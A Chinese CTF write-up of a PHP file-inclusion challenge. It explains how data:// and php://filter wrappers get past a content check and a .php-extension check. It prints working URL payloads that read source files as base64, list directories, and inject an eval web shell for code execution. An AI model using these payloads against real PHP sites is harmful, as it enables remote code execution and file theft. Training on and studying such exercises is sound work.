题目如下
<?php
ini_set('open_basedir','/var/www/html/protocols/');
highlight_file(__FILE__);
$file = $_GET['file'];
$text = $_GET['text'];
if(isset($text)&&(file_get_contents($text,'r')==='how_to_bypass?')){
$ext = pathinfo($file,PATHINFO_EXTENSION);
if($ext==='php'){
include $file;
}else{
echo "no no";
}
}else{
echo "no";
}
从第一行分析 open_basedir是php.ini中的一个配置选项,它可将用户访问文件的活动范围限制在指定的区域。
举个例子:假设open_basedir=/home/wwwroot/home/web1/:/tmp/,那么通过web1访问服务器的用户就无法获取服务器上除了/home/wwwroot/home/web1/和/tmp/这两个目录以外的文件。
也就是说现在用户只能获取/var/www/html/protocols/上的文件,做不出的题目的时候以为是这个原因,但是并不是。
ini_set('open_basedir','/var/www/html/protocols/');
接着分析这一行,file_get_contents() 把整个文件读入一个字符串中,也就是说$text是传入一个文件,最后从文件中读到的字符串是how_to_bypass?
if(isset($text)&&(file_get_contents($text,'r')==='how_to_bypass?')){
了解一下伪协议
data协议
php5.2.0起,数据流封装器开始有效,主要用于数据流的读取。如果传入的数据是PHP代码,就会执行代码
使用方法:data://text/plain;base64,xxxx(base64编码后的数据)
构造
http://120.24.194.57:2333/protocols?text=data://text/plain,how_to_bypass?&file=php://filter/read=convert.base64-encode/resource=flag.php
text构造了一个读数据的,读出后得到的字串就是how_to_bypass?然后进入if判断
pathinfo() 函数是获得文件后缀,比如获得.php,所以file的参数应该是.php结尾
接下来构造file
首先这是一个file关键字的get参数传递,
php://是一种协议名称,php://filter/是一种访问本地文件的协议,
/read=convert.base64-encode/表示读取的方式是base64编码后,
resource=flag.php表示目标文件为flag.php
以上,并无反应,经过大佬提点,才知道要读目录,目标文件可能并不是flag.php
http://120.24.194.57:2333/protocols/?text=data://text/plain,how_to_bypass?&file=data://text/plain,<?php print_r(glob('*.php'));?>.php
以上是读目录的payload,data://后可以执行php代码,于是用glob函数读目录,得到。php代码后要加.php才能通过pathinfo,这个要注意
便可以得到改掉之前的flag.php
http://120.24.194.57:2333/protocols?text=data://text/plain,how_to_bypass?&file=php://filter/read=convert.base64-encode/resource=fll11llaaaggg.php
得到一串base64编码,解码得到flag.
以下还有其他读目录的方式
http://120.24.194.57:2333/protocols/?text=data://text/plain,how_to_bypass?&file=data://text/plain,<?php print_r(glob('/var/www/html/protocols/*'));?>.php
http://120.24.194.57:2333/protocols/?text=data://text/plain,how_to_bypass?&file=data://text/plain,<?php print_r(glob('*.*'));?>.php
http://120.24.194.57:2333/protocols/?text=data://text/plain,how_to_bypass?&file=data://text/plain,<?php @eval($_REQUEST[1]);?>.php&1=var_dump(scandir('.'));
这里说一下,eval执行request[1]这个参数,php代码后依然要以.php结尾,1传参var_dump(scandir('.'));var_dump此函数显示关于一个或多个表达式的结构信息,scandir('.') 是列出要扫描的目录中的文件和目录'.'代表当前目录,这里也可以用/var/www/html/protocols/代替。